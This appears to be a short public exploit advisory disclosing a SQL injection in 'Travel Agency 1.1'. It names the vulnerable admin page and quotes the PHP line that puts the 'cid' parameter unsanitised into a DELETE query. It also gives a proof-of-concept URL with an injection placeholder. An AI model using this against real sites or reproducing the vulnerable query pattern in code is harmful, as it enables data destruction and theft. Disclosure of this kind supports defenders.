# Exploit Title: Travel Agency 1.1 SQL Injection
# Data: 06.23.2018
# Exploit Author: Ashkan Moghaddas
# Tested on: Windows - Linux
# Google Dork: N/A
=========
Vulnerable Page:
=========
/admin/add.city.php
==========
Vulnerable Source:
==========
Line20:if(isset($_GET['action']) && ($_GET['action'] == 'del')){
Line21:$delete = mysql_query("DELETE FROM destination where destination_id = '".$_GET['cid']."'");
=========
POC:
=========
http://site.com/admin/add.city.php?cid=[SQL]
============================
WebSite : UltraSec.Org
Channel : @UltraSecurity
Email : ashkanmoghaddas77@gmail.com
Special Thanks : Abolfaz Hajizadeh , MrQadir , Milad Ranjbar